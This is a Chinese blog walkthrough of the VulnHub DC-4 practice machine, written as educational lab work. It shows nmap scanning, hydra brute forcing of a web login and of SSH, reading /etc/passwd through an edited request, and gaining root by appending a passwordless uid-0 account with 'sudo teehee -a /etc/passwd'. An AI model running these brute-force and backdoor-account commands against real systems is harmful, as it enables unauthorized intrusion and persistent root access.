DC-4--vulnhub靶场

已于 2022-08-09 14:00:39 修改
阅读量163 收藏
点赞数
分类专栏: vulnhub靶场笔记 文章标签: 安全 kali linux flag linux ssh
于 2022-07-21 06:47:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46982383/article/details/125904159
版权

靶机地址

网络:NAT

目录

1、主机发现

2、端口扫描

3、网站识别

 4、使用burp suite抓包,改包

5、使用22端口的ssh,hydra爆破

6、提权

 7、总结

 

1、主机发现

-sn: Ping Scan - disable port scan

nmap 192.168.194.0/24 -sn 

基于ARP协议

arp-scan -l 

netdiscover -r 192.168.194.0/24    

 

 确定靶机IP为192.168.194.162

2、端口扫描

nmap -sV -A -p- 192.168.194.162

 e2e3025bc65d4745be8b9b7160a01713.png

22/tcp open  ssh 

80/tcp open  http   

3、网站识别

有一个登录框,账号为admin,没有验证码,尝试弱口令爆破

19074ee6c9594b7dbdfdb784268ac0ad.png

 whatweb http://192.168.194.162

dirb http://192.168.194.162 -X .txt,.php,zip

没有找到有用信息,尝试爆破,使用kali自带的

工具hydra

字典/usr/share/wordlists/rockyou.txt.gz

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 192.168.194.162 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

e7e3e085bfbc47bab241c705a0095f32.png

 账号admin

密码happy

bd610c525b0c45e28a9a5dce1b3667a3.png

 4、使用burp suite抓包,改包

85d362799d0b47b596b6aa37bb11948a.png

 查看/etc/passwd,/etc/passwd文件内容非常规律,每行记录对应一个用户。 每行用户信息都以":"作为分隔符,划分为7个字段。参考

d365b6d4f3d24255a7d92d317777155f.png

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

得到3个普通用户,

charles
jim
sam

切换用户一个个查看,发现密码集,

cat /home/jim/backups/old-passwords.bak

8a9e2234c69a4a1a84b82703c61d8713.png

 

5、使用22端口的ssh,hydra爆破

-t 指定线程

hydra -L users.txt -P passwd.txt 192.168.194.162 ssh

login: jim  

password: jibril04
 

14a69c6e739d483d927889548d9f2956.png

6、提权

 You have mail.

查看mail,发现账号charles 密码 ^xHhA&hvim0y

2a5d2727a0a4464087824117e9f25d6a.png

a57a7c61c5ae414bb423ed2f65fe78bb.png 

 sudo -l查看权限,发现可以不需要密码执行teehee(root权限),teehee可以来向其他文件写入内容

先介绍下/etc/passwd中不同字段的含义,参考

用户名:口令:用户标识号(uid):组标识号(gid):注释说明:用户主目录:命令解释程序

echo "admin0::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

b9b309cc3e0f4db4963d54e546b9187a.png

 7、总结

  • 使用hydra进行网站登录爆破,之前一直用burp suite
  • teehee提权是使用teehee -a 把一个账号密码写入到etc/passwd中

 

逆风/
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 340
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶场----4、DC-4
七天
02-22 935
Vulnhub-DC4
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2485
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag
vulnhub靶场DC-3
qq_58091216的博客
01-08 1199
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
Vulnhub靶场----3、DC-3.2
七天
03-14 552
1 、只开放80端口的情况下,网站指纹、目录扫描等方向 2 、通过网站CMS版本信息搜索相关版本漏洞 3 、利用版本SQL注入漏洞获取后台登录账号密码 4 、后台寻找webshell插入地址 5 、获取shell,寻找服务器版本漏洞 6 、利用服务器版本漏洞提权。
Vulnhub靶场----5、DC-5
七天
03-14 613
用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行。1.访问http://192.168.144.153,点击contact页面。网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;2.利用文件包含使上传的文件以PHP格式执行。4.使用python生成交互式shell。1.查找以root权限运行的组件。1.利用文件包含写入一句话木马。开放端口是80、36888。3、文件包含利用 获取权限。3.路径存在文件包含。
Vulnhub靶场----9、DC-9
七天
03-03 736
Vulnhub-DC9
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4460
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub靶场----2、DC-2
七天
02-21 543
Vulnhub-DC2
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vuInhub靶场实战系列-DC-4实战
05-22
vuInhub靶场实战系列-DC-4实战
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1080
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 434
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 542
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 838
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
2014年电源网年会-沙德尚-高频隔离软开关DC-DC变换器
06-30
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值